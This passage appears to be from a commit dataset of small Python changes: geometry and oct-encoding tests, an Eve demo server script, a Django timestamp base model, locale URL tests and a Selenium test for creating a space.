octEncode([2.0, 0.0, 0.0])
with self.assertRaises(ValueError):
octEncode([0.0, 0.0, 0.0])
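For background, the oct encoding exercised here maps a unit normal onto an octahedron and quantizes each axis to one byte. A self-contained sketch of the standard algorithm follows; it reproduces the values asserted above, but it mirrors the well-known technique rather than the package's exact source:

def _sign_not_zero(v):
    return 1.0 if v >= 0.0 else -1.0

def oct_encode(x, y, z):
    # Project the unit vector onto the octahedron |x| + |y| + |z| = 1.
    s = abs(x) + abs(y) + abs(z)
    px, py = x / s, y / s
    if z < 0.0:
        # Fold the lower hemisphere over the diagonals.
        px, py = ((1.0 - abs(py)) * _sign_not_zero(px),
                  (1.0 - abs(px)) * _sign_not_zero(py))
    # Quantize [-1, 1] to one byte per component.
    return (int(round((px * 0.5 + 0.5) * 255.0)),
            int(round((py * 0.5 + 0.5) * 255.0)))

print(oct_encode(0.0, 0.0, -1.0))  # (255, 255), matching testOctEncode
print(oct_encode(0.0, 0.0, 1.0))   # (128, 128)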
|
|
49d847cfc6381dc6df41447eba650a5bf265a163
|
tests/test_geometry.py
|
tests/test_geometry.py
|
from gaphas.geometry import (
distance_rectangle_point,
intersect_line_line,
point_on_rectangle,
)
def test_distance_rectangle_point():
assert distance_rectangle_point((2, 0, 2, 2), (0, 0)) == 2
def test_distance_point_in_rectangle():
assert distance_rectangle_point((0, 0, 2, 2), (1, 1)) == 0
def test_point_on_rectangle():
assert point_on_rectangle((2, 2, 2, 2), (0, 0)) == (2, 2)
assert point_on_rectangle((2, 2, 2, 2), (3, 0)) == (3, 2)
def test_intersect_line_line():
assert intersect_line_line((3, 0), (8, 10), (0, 0), (10, 10)) == (6, 6)
assert intersect_line_line((0, 0), (10, 10), (3, 0), (8, 10)) == (6, 6)
assert intersect_line_line((0, 0), (10, 10), (8, 10), (3, 0)) == (6, 6)
assert intersect_line_line((8, 10), (3, 0), (0, 0), (10, 10)) == (6, 6)
def test_intersect_line_line_not_crossing():
assert intersect_line_line((0, 0), (0, 10), (3, 0), (8, 10)) is None
assert intersect_line_line((0, 0), (0, 10), (3, 0), (3, 10)) is None
|
Add tests for geometry module
|
Add tests for geometry module
|
Python
|
lgpl-2.1
|
amolenaar/gaphas
|
Add tests for geometry module
|
from gaphas.geometry import (
distance_rectangle_point,
intersect_line_line,
point_on_rectangle,
)
def test_distance_rectangle_point():
assert distance_rectangle_point((2, 0, 2, 2), (0, 0)) == 2
def test_distance_point_in_rectangle():
assert distance_rectangle_point((0, 0, 2, 2), (1, 1)) == 0
def test_point_on_rectangle():
assert point_on_rectangle((2, 2, 2, 2), (0, 0)) == (2, 2)
assert point_on_rectangle((2, 2, 2, 2), (3, 0)) == (3, 2)
def test_intersect_line_line():
assert intersect_line_line((3, 0), (8, 10), (0, 0), (10, 10)) == (6, 6)
assert intersect_line_line((0, 0), (10, 10), (3, 0), (8, 10)) == (6, 6)
assert intersect_line_line((0, 0), (10, 10), (8, 10), (3, 0)) == (6, 6)
assert intersect_line_line((8, 10), (3, 0), (0, 0), (10, 10)) == (6, 6)
def test_intersect_line_line_not_crossing():
assert intersect_line_line((0, 0), (0, 10), (3, 0), (8, 10)) is None
assert intersect_line_line((0, 0), (0, 10), (3, 0), (3, 10)) is None
|
<commit_before><commit_msg>Add tests for geometry module<commit_after>
|
from gaphas.geometry import (
distance_rectangle_point,
intersect_line_line,
point_on_rectangle,
)
def test_distance_rectangle_point():
assert distance_rectangle_point((2, 0, 2, 2), (0, 0)) == 2
def test_distance_point_in_rectangle():
assert distance_rectangle_point((0, 0, 2, 2), (1, 1)) == 0
def test_point_on_rectangle():
assert point_on_rectangle((2, 2, 2, 2), (0, 0)) == (2, 2)
assert point_on_rectangle((2, 2, 2, 2), (3, 0)) == (3, 2)
def test_intersect_line_line():
assert intersect_line_line((3, 0), (8, 10), (0, 0), (10, 10)) == (6, 6)
assert intersect_line_line((0, 0), (10, 10), (3, 0), (8, 10)) == (6, 6)
assert intersect_line_line((0, 0), (10, 10), (8, 10), (3, 0)) == (6, 6)
assert intersect_line_line((8, 10), (3, 0), (0, 0), (10, 10)) == (6, 6)
def test_intersect_line_line_not_crossing():
assert intersect_line_line((0, 0), (0, 10), (3, 0), (8, 10)) is None
assert intersect_line_line((0, 0), (0, 10), (3, 0), (3, 10)) is None
|
Add tests for geometry module
from gaphas.geometry import (
distance_rectangle_point,
intersect_line_line,
point_on_rectangle,
)
def test_distance_rectangle_point():
assert distance_rectangle_point((2, 0, 2, 2), (0, 0)) == 2
def test_distance_point_in_rectangle():
assert distance_rectangle_point((0, 0, 2, 2), (1, 1)) == 0
def test_point_on_rectangle():
assert point_on_rectangle((2, 2, 2, 2), (0, 0)) == (2, 2)
assert point_on_rectangle((2, 2, 2, 2), (3, 0)) == (3, 2)
def test_intersect_line_line():
assert intersect_line_line((3, 0), (8, 10), (0, 0), (10, 10)) == (6, 6)
assert intersect_line_line((0, 0), (10, 10), (3, 0), (8, 10)) == (6, 6)
assert intersect_line_line((0, 0), (10, 10), (8, 10), (3, 0)) == (6, 6)
assert intersect_line_line((8, 10), (3, 0), (0, 0), (10, 10)) == (6, 6)
def test_intersect_line_line_not_crossing():
assert intersect_line_line((0, 0), (0, 10), (3, 0), (8, 10)) is None
assert intersect_line_line((0, 0), (0, 10), (3, 0), (3, 10)) is None
|
<commit_before><commit_msg>Add tests for geometry module<commit_after>from gaphas.geometry import (
distance_rectangle_point,
intersect_line_line,
point_on_rectangle,
)
def test_distance_rectangle_point():
assert distance_rectangle_point((2, 0, 2, 2), (0, 0)) == 2
def test_distance_point_in_rectangle():
assert distance_rectangle_point((0, 0, 2, 2), (1, 1)) == 0
def test_point_on_rectangle():
assert point_on_rectangle((2, 2, 2, 2), (0, 0)) == (2, 2)
assert point_on_rectangle((2, 2, 2, 2), (3, 0)) == (3, 2)
def test_intersect_line_line():
assert intersect_line_line((3, 0), (8, 10), (0, 0), (10, 10)) == (6, 6)
assert intersect_line_line((0, 0), (10, 10), (3, 0), (8, 10)) == (6, 6)
assert intersect_line_line((0, 0), (10, 10), (8, 10), (3, 0)) == (6, 6)
assert intersect_line_line((8, 10), (3, 0), (0, 0), (10, 10)) == (6, 6)
def test_intersect_line_line_not_crossing():
assert intersect_line_line((0, 0), (0, 10), (3, 0), (8, 10)) is None
assert intersect_line_line((0, 0), (0, 10), (3, 0), (3, 10)) is None
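For reference, the intersection these tests exercise reduces to solving two parametric line equations with a 2D cross product; a compact standalone sketch, independent of gaphas:

def segment_intersection(p1, p2, p3, p4):
    """Intersection point of segments p1-p2 and p3-p4, or None."""
    d1x, d1y = p2[0] - p1[0], p2[1] - p1[1]
    d2x, d2y = p4[0] - p3[0], p4[1] - p3[1]
    denom = d1x * d2y - d1y * d2x      # cross product of the directions
    if denom == 0:
        return None                    # parallel or collinear: no single point
    t = ((p3[0] - p1[0]) * d2y - (p3[1] - p1[1]) * d2x) / float(denom)
    u = ((p3[0] - p1[0]) * d1y - (p3[1] - p1[1]) * d1x) / float(denom)
    if 0 <= t <= 1 and 0 <= u <= 1:
        return (p1[0] + t * d1x, p1[1] + t * d1y)
    return None

print(segment_intersection((3, 0), (8, 10), (0, 0), (10, 10)))  # (6.0, 6.0)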
|
|
8ccdd028347a73fc4706b0d34c4ee90eb9777336
|
run.py
|
run.py
|
# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
    A demonstration of a simple API powered by the Eve REST API.
    The live demo is available at eve-demo.herokuapp.com. Please keep in mind
    that it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2013 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
import os
from eve import Eve
if __name__ == '__main__':
# Heroku support: bind to PORT if defined, otherwise default to 5000.
if 'PORT' in os.environ:
port = int(os.environ.get('PORT'))
host = '0.0.0.0'
else:
port = 5000
host = '127.0.0.1'
app = Eve()
app.run(host=host, port=port)
|
# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
    A demonstration of a simple API powered by the Eve REST API.
    The live demo is available at eve-demo.herokuapp.com. Please keep in mind
    that it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2013 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
import os
from eve import Eve
if __name__ == '__main__':
# Heroku support: bind to PORT if defined, otherwise default to 5000.
if 'PORT' in os.environ:
port = int(os.environ.get('PORT'))
# use '0.0.0.0' to ensure your REST API is reachable from all your
# network (and not only your computer).
host = '0.0.0.0'
else:
port = 5000
host = '127.0.0.1'
app = Eve()
app.run(host=host, port=port)
|
Use '0.0.0.0' to ensure your API is reachable outside localhost.
|
Use '0.0.0.0' to ensure your API is reachable outside localhost.
|
Python
|
bsd-3-clause
|
nicolaiarocci/eve-demo,kidaa/eve-demo
|
# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
    A demonstration of a simple API powered by the Eve REST API.
    The live demo is available at eve-demo.herokuapp.com. Please keep in mind
    that it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2013 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
import os
from eve import Eve
if __name__ == '__main__':
# Heroku support: bind to PORT if defined, otherwise default to 5000.
if 'PORT' in os.environ:
port = int(os.environ.get('PORT'))
host = '0.0.0.0'
else:
port = 5000
host = '127.0.0.1'
app = Eve()
app.run(host=host, port=port)
Use '0.0.0.0' to ensure your API is reachable outside localhost.
|
# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
    A demonstration of a simple API powered by the Eve REST API.
    The live demo is available at eve-demo.herokuapp.com. Please keep in mind
    that it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2013 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
import os
from eve import Eve
if __name__ == '__main__':
# Heroku support: bind to PORT if defined, otherwise default to 5000.
if 'PORT' in os.environ:
port = int(os.environ.get('PORT'))
# use '0.0.0.0' to ensure your REST API is reachable from all your
# network (and not only your computer).
host = '0.0.0.0'
else:
port = 5000
host = '127.0.0.1'
app = Eve()
app.run(host=host, port=port)
|
<commit_before># -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
    A demonstration of a simple API powered by the Eve REST API.
    The live demo is available at eve-demo.herokuapp.com. Please keep in mind
    that it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2013 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
import os
from eve import Eve
if __name__ == '__main__':
# Heroku support: bind to PORT if defined, otherwise default to 5000.
if 'PORT' in os.environ:
port = int(os.environ.get('PORT'))
host = '0.0.0.0'
else:
port = 5000
host = '127.0.0.1'
app = Eve()
app.run(host=host, port=port)
<commit_msg>Use '0.0.0.0' to ensure your API is reachable outside localhost.<commit_after>
|
# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
    A demonstration of a simple API powered by the Eve REST API.
    The live demo is available at eve-demo.herokuapp.com. Please keep in mind
    that it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2013 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
import os
from eve import Eve
if __name__ == '__main__':
# Heroku support: bind to PORT if defined, otherwise default to 5000.
if 'PORT' in os.environ:
port = int(os.environ.get('PORT'))
# use '0.0.0.0' to ensure your REST API is reachable from all your
# network (and not only your computer).
host = '0.0.0.0'
else:
port = 5000
host = '127.0.0.1'
app = Eve()
app.run(host=host, port=port)
|
# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
    A demonstration of a simple API powered by the Eve REST API.
    The live demo is available at eve-demo.herokuapp.com. Please keep in mind
    that it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2013 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
import os
from eve import Eve
if __name__ == '__main__':
# Heroku support: bind to PORT if defined, otherwise default to 5000.
if 'PORT' in os.environ:
port = int(os.environ.get('PORT'))
host = '0.0.0.0'
else:
port = 5000
host = '127.0.0.1'
app = Eve()
app.run(host=host, port=port)
Use '0.0.0.0' to ensure your API is reachable outside localhost.
# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
    A demonstration of a simple API powered by the Eve REST API.
    The live demo is available at eve-demo.herokuapp.com. Please keep in mind
    that it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2013 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
import os
from eve import Eve
if __name__ == '__main__':
# Heroku support: bind to PORT if defined, otherwise default to 5000.
if 'PORT' in os.environ:
port = int(os.environ.get('PORT'))
# use '0.0.0.0' to ensure your REST API is reachable from all your
# network (and not only your computer).
host = '0.0.0.0'
else:
port = 5000
host = '127.0.0.1'
app = Eve()
app.run(host=host, port=port)
|
<commit_before># -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
    A demonstration of a simple API powered by the Eve REST API.
    The live demo is available at eve-demo.herokuapp.com. Please keep in mind
    that it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2013 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
import os
from eve import Eve
if __name__ == '__main__':
# Heroku support: bind to PORT if defined, otherwise default to 5000.
if 'PORT' in os.environ:
port = int(os.environ.get('PORT'))
host = '0.0.0.0'
else:
port = 5000
host = '127.0.0.1'
app = Eve()
app.run(host=host, port=port)
<commit_msg>Use '0.0.0.0' to ensure your API is reachable outside localhost.<commit_after># -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
    A demonstration of a simple API powered by the Eve REST API.
    The live demo is available at eve-demo.herokuapp.com. Please keep in mind
    that it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2013 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
import os
from eve import Eve
if __name__ == '__main__':
# Heroku support: bind to PORT if defined, otherwise default to 5000.
if 'PORT' in os.environ:
port = int(os.environ.get('PORT'))
# use '0.0.0.0' to ensure your REST API is reachable from all your
# network (and not only your computer).
host = '0.0.0.0'
else:
port = 5000
host = '127.0.0.1'
app = Eve()
app.run(host=host, port=port)
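As a usage note, the PORT branch above can be folded into two expressions; a tiny equivalent sketch:

import os

# os.environ.get with a default collapses the if/else; binding to
# 0.0.0.0 only when PORT is set preserves the behaviour above.
port = int(os.environ.get('PORT', 5000))
host = '0.0.0.0' if 'PORT' in os.environ else '127.0.0.1'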
|
e1634155d24be11d9f6648dd8983d76d4da78419
|
base/model_utils.py
|
base/model_utils.py
|
from django.db import models
class TimeStampedModel(models.Model):
"""
An abstract base class model that provides self-updating
``created`` and ``modified`` fields
"""
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
class Meta:
abstract = True
|
Move 'TimeStampedModel' to 'base' so it can be used in other apps
|
Move 'TimeStampedModel' to 'base' so it can be used in other apps
|
Python
|
apache-2.0
|
pkimber/base,pkimber/base,pkimber/base,pkimber/base
|
Move 'TimeStampedModel' to 'base' so it can be used in other apps
|
from django.db import models
class TimeStampedModel(models.Model):
"""
An abstract base class model that provides self-updating
``created`` and ``modified`` fields
"""
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
class Meta:
abstract = True
|
<commit_before><commit_msg>Move 'TimeStampedModel' to 'base' so it can be used in other apps<commit_after>
|
from django.db import models
class TimeStampedModel(models.Model):
"""
An abstract base class model that provides self-updating
``created`` and ``modified`` fields
"""
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
class Meta:
abstract = True
|
Move 'TimeStampedModel' to 'base' so it can be used in other apps
from django.db import models
class TimeStampedModel(models.Model):
"""
An abstract base class model that provides self-updating
``created`` and ``modified`` fields
"""
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
class Meta:
abstract = True
|
<commit_before><commit_msg>Move 'TimeStampedModel' to 'base' so it can be used in other apps<commit_after>from django.db import models
class TimeStampedModel(models.Model):
"""
An abstract base class model that provides self-updating
``created`` and ``modified`` fields
"""
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
class Meta:
abstract = True
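Usage-wise, any app can now inherit the stamps from base. A hypothetical consumer model (Article is illustrative, not part of the repo):

from django.db import models
from base.model_utils import TimeStampedModel

class Article(TimeStampedModel):
    # created/modified come from the abstract base; because
    # Meta.abstract = True, no table is created for the base itself.
    title = models.CharField(max_length=100)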
|
|
ae70dff0fddd580c82f744b0a450e489092014ac
|
fjord/base/tests/test_urlresolvers.py
|
fjord/base/tests/test_urlresolvers.py
|
from nose.tools import eq_
from fjord.base.tests import TestCase
from fjord.base.urlresolvers import reverse
class TestReverse(TestCase):
def test_no_locale(self):
# Note: This depends on the 'about' view. If we change that,
# then it breaks this test. But it seems silly to do a bunch
# of work to set up a better less fragile test plus it's
# unlikely we'll change the 'about' view.
eq_(reverse('about-view'), '/en-US/about')
def test_locale(self):
# Note: This depends on the 'about' view and the 'es'
# locale. If we change those, then it breaks this test.
eq_(reverse('about-view', locale='es'), '/es/about')
|
Add tests for new reverse
|
Add tests for new reverse
This adds the tests that should have gone with commit 16250bf.
|
Python
|
bsd-3-clause
|
rlr/fjord,mozilla/fjord,hoosteeno/fjord,mozilla/fjord,mozilla/fjord,DESHRAJ/fjord,staranjeet/fjord,Ritsyy/fjord,rlr/fjord,staranjeet/fjord,lgp171188/fjord,Ritsyy/fjord,Ritsyy/fjord,Ritsyy/fjord,staranjeet/fjord,lgp171188/fjord,rlr/fjord,hoosteeno/fjord,staranjeet/fjord,mozilla/fjord,hoosteeno/fjord,rlr/fjord,lgp171188/fjord,DESHRAJ/fjord,lgp171188/fjord,hoosteeno/fjord,DESHRAJ/fjord
|
Add tests for new reverse
This adds the tests that should have gone with commit 16250bf.
|
from nose.tools import eq_
from fjord.base.tests import TestCase
from fjord.base.urlresolvers import reverse
class TestReverse(TestCase):
def test_no_locale(self):
# Note: This depends on the 'about' view. If we change that,
# then it breaks this test. But it seems silly to do a bunch
# of work to set up a better less fragile test plus it's
# unlikely we'll change the 'about' view.
eq_(reverse('about-view'), '/en-US/about')
def test_locale(self):
# Note: This depends on the 'about' view and the 'es'
# locale. If we change those, then it breaks this test.
eq_(reverse('about-view', locale='es'), '/es/about')
|
<commit_before><commit_msg>Add tests for new reverse
This adds the tests that should have gone with commit 16250bf.<commit_after>
|
from nose.tools import eq_
from fjord.base.tests import TestCase
from fjord.base.urlresolvers import reverse
class TestReverse(TestCase):
def test_no_locale(self):
# Note: This depends on the 'about' view. If we change that,
# then it breaks this test. But it seems silly to do a bunch
# of work to set up a better less fragile test plus it's
# unlikely we'll change the 'about' view.
eq_(reverse('about-view'), '/en-US/about')
def test_locale(self):
# Note: This depends on the 'about' view and the 'es'
# locale. If we change those, then it breaks this test.
eq_(reverse('about-view', locale='es'), '/es/about')
|
Add tests for new reverse
This adds the tests that should have gone with commit 16250bf.
from nose.tools import eq_
from fjord.base.tests import TestCase
from fjord.base.urlresolvers import reverse
class TestReverse(TestCase):
def test_no_locale(self):
# Note: This depends on the 'about' view. If we change that,
# then it breaks this test. But it seems silly to do a bunch
# of work to set up a better less fragile test plus it's
# unlikely we'll change the 'about' view.
eq_(reverse('about-view'), '/en-US/about')
def test_locale(self):
# Note: This depends on the 'about' view and the 'es'
# locale. If we change those, then it breaks this test.
eq_(reverse('about-view', locale='es'), '/es/about')
|
<commit_before><commit_msg>Add tests for new reverse
This adds the tests that should have gone with commit 16250bf.<commit_after>from nose.tools import eq_
from fjord.base.tests import TestCase
from fjord.base.urlresolvers import reverse
class TestReverse(TestCase):
def test_no_locale(self):
# Note: This depends on the 'about' view. If we change that,
# then it breaks this test. But it seems silly to do a bunch
# of work to set up a better less fragile test plus it's
# unlikely we'll change the 'about' view.
eq_(reverse('about-view'), '/en-US/about')
def test_locale(self):
# Note: This depends on the 'about' view and the 'es'
# locale. If we change those, then it breaks this test.
eq_(reverse('about-view', locale='es'), '/es/about')
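For intuition, a locale-aware reverse is usually a thin wrapper that prefixes the locale segment onto Django's resolved path. A rough sketch of the idea, assuming Django's stock resolver of that era (this is not fjord's actual implementation):

from django.core.urlresolvers import reverse as django_reverse  # django.urls in newer Django

def reverse(viewname, locale='en-US', args=None, kwargs=None):
    # Resolve normally, then prepend the locale segment, so that
    # reverse('about-view', locale='es') yields '/es/about'.
    path = django_reverse(viewname, args=args, kwargs=kwargs)
    return '/' + locale + path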
|
|
bdc3fab8c4da9bd64de46cedc600fcf1c771aada
|
tests/functional/test_create_space.py
|
tests/functional/test_create_space.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2010-2012 Cidadania S. Coop. Galega
#
# This file is part of e-cidadania.
#
# e-cidadania is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# e-cidadania is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with e-cidadania. If not, see <http://www.gnu.org/licenses/>.
import os
from selenium.webdriver.common.keys import Keys
from tests.functional_utils import FunctionalTestCase
class CreateSpaceTest(FunctionalTestCase):
"""Tests if the page to create a space works correctly.
"""
def setUp(self):
self.init()
def testCreateSpace(self):
username = 'test_user'
password = 'test_password'
self.create_super_user(username, password)
url = self.live_server_url + self.getURL('site-index')
self.browser.get(url)
self.wait(2)
self.browser.find_element_by_link_text("Login").click()
self.wait(2)
username_field = self.browser.find_element_by_name('username')
username_field.send_keys(username)
password_field = self.browser.find_element_by_name('password')
password_field.send_keys(password)
self.wait(2)
password_field.send_keys(Keys.RETURN)
#self.wait(1)
self.wait(2)
url = self.live_server_url + self.getURL('create-space')
self.browser.get(url)
self.wait(2)
        # Now we fill the create space form
name_field = self.browser.find_element_by_name('name')
name_field.send_keys('test_space')
url_field = self.browser.find_element_by_name('url')
url_field.send_keys('test_url')
logo_field = self.browser.find_element_by_name('logo')
logo_field.send_keys(os.getcwd()+'/generic.jpeg')
banner_field = self.browser.find_element_by_name('banner')
banner_field.send_keys(os.getcwd()+'/generic.jpeg')
self.wait(2)
#url_field.send_keys(Keys.RETURN)
banner_field.submit()
self.wait(300)
|
Add functional tests for create a space.
|
Add functional tests for create a space.
|
Python
|
apache-2.0
|
cidadania/e-cidadania,cidadania/e-cidadania
|
Add functional tests for create a space.
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2010-2012 Cidadania S. Coop. Galega
#
# This file is part of e-cidadania.
#
# e-cidadania is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# e-cidadania is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with e-cidadania. If not, see <http://www.gnu.org/licenses/>.
import os
from selenium.webdriver.common.keys import Keys
from tests.functional_utils import FunctionalTestCase
class CreateSpaceTest(FunctionalTestCase):
"""Tests if the page to create a space works correctly.
"""
def setUp(self):
self.init()
def testCreateSpace(self):
username = 'test_user'
password = 'test_password'
self.create_super_user(username, password)
url = self.live_server_url + self.getURL('site-index')
self.browser.get(url)
self.wait(2)
self.browser.find_element_by_link_text("Login").click()
self.wait(2)
username_field = self.browser.find_element_by_name('username')
username_field.send_keys(username)
password_field = self.browser.find_element_by_name('password')
password_field.send_keys(password)
self.wait(2)
password_field.send_keys(Keys.RETURN)
#self.wait(1)
self.wait(2)
url = self.live_server_url + self.getURL('create-space')
self.browser.get(url)
self.wait(2)
# Now we fill the create space form
name_field = self.browser.find_element_by_name('name')
name_field.send_keys('test_space')
url_field = self.browser.find_element_by_name('url')
url_field.send_keys('test_url')
logo_field = self.browser.find_element_by_name('logo')
logo_field.send_keys(os.getcwd()+'/generic.jpeg')
banner_field = self.browser.find_element_by_name('banner')
banner_field.send_keys(os.getcwd()+'/generic.jpeg')
self.wait(2)
#url_field.send_keys(Keys.RETURN)
banner_field.submit()
self.wait(300)
|
<commit_before><commit_msg>Add functional tests for creating a space.<commit_after>
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2010-2012 Cidadania S. Coop. Galega
#
# This file is part of e-cidadania.
#
# e-cidadania is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# e-cidadania is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with e-cidadania. If not, see <http://www.gnu.org/licenses/>.
import os
from selenium.webdriver.common.keys import Keys
from tests.functional_utils import FunctionalTestCase
class CreateSpaceTest(FunctionalTestCase):
"""Tests if the page to create a space works correctly.
"""
def setUp(self):
self.init()
def testCreateSpace(self):
username = 'test_user'
password = 'test_password'
self.create_super_user(username, password)
url = self.live_server_url + self.getURL('site-index')
self.browser.get(url)
self.wait(2)
self.browser.find_element_by_link_text("Login").click()
self.wait(2)
username_field = self.browser.find_element_by_name('username')
username_field.send_keys(username)
password_field = self.browser.find_element_by_name('password')
password_field.send_keys(password)
self.wait(2)
password_field.send_keys(Keys.RETURN)
#self.wait(1)
self.wait(2)
url = self.live_server_url + self.getURL('create-space')
self.browser.get(url)
self.wait(2)
# Now we fill the create space form
name_field = self.browser.find_element_by_name('name')
name_field.send_keys('test_space')
url_field = self.browser.find_element_by_name('url')
url_field.send_keys('test_url')
logo_field = self.browser.find_element_by_name('logo')
logo_field.send_keys(os.getcwd()+'/generic.jpeg')
banner_field = self.browser.find_element_by_name('banner')
banner_field.send_keys(os.getcwd()+'/generic.jpeg')
self.wait(2)
#url_field.send_keys(Keys.RETURN)
banner_field.submit()
self.wait(300)
|
Add functional tests for creating a space.#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2010-2012 Cidadania S. Coop. Galega
#
# This file is part of e-cidadania.
#
# e-cidadania is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# e-cidadania is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with e-cidadania. If not, see <http://www.gnu.org/licenses/>.
import os
from selenium.webdriver.common.keys import Keys
from tests.functional_utils import FunctionalTestCase
class CreateSpaceTest(FunctionalTestCase):
"""Tests if the page to create a space works correctly.
"""
def setUp(self):
self.init()
def testCreateSpace(self):
username = 'test_user'
password = 'test_password'
self.create_super_user(username, password)
url = self.live_server_url + self.getURL('site-index')
self.browser.get(url)
self.wait(2)
self.browser.find_element_by_link_text("Login").click()
self.wait(2)
username_field = self.browser.find_element_by_name('username')
username_field.send_keys(username)
password_field = self.browser.find_element_by_name('password')
password_field.send_keys(password)
self.wait(2)
password_field.send_keys(Keys.RETURN)
#self.wait(1)
self.wait(2)
url = self.live_server_url + self.getURL('create-space')
self.browser.get(url)
self.wait(2)
#Now we fill the creat space form
name_field = self.browser.find_element_by_name('name')
name_field.send_keys('test_space')
url_field = self.browser.find_element_by_name('url')
url_field.send_keys('test_url')
logo_field = self.browser.find_element_by_name('logo')
logo_field.send_keys(os.getcwd()+'/generic.jpeg')
banner_field = self.browser.find_element_by_name('banner')
banner_field.send_keys(os.getcwd()+'/generic.jpeg')
self.wait(2)
#url_field.send_keys(Keys.RETURN)
banner_field.submit()
self.wait(300)
|
<commit_before><commit_msg>Add functional tests for creating a space.<commit_after>#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2010-2012 Cidadania S. Coop. Galega
#
# This file is part of e-cidadania.
#
# e-cidadania is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# e-cidadania is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with e-cidadania. If not, see <http://www.gnu.org/licenses/>.
import os
from selenium.webdriver.common.keys import Keys
from tests.functional_utils import FunctionalTestCase
class CreateSpaceTest(FunctionalTestCase):
"""Tests if the page to create a space works correctly.
"""
def setUp(self):
self.init()
def testCreateSpace(self):
username = 'test_user'
password = 'test_password'
self.create_super_user(username, password)
url = self.live_server_url + self.getURL('site-index')
self.browser.get(url)
self.wait(2)
self.browser.find_element_by_link_text("Login").click()
self.wait(2)
username_field = self.browser.find_element_by_name('username')
username_field.send_keys(username)
password_field = self.browser.find_element_by_name('password')
password_field.send_keys(password)
self.wait(2)
password_field.send_keys(Keys.RETURN)
#self.wait(1)
self.wait(2)
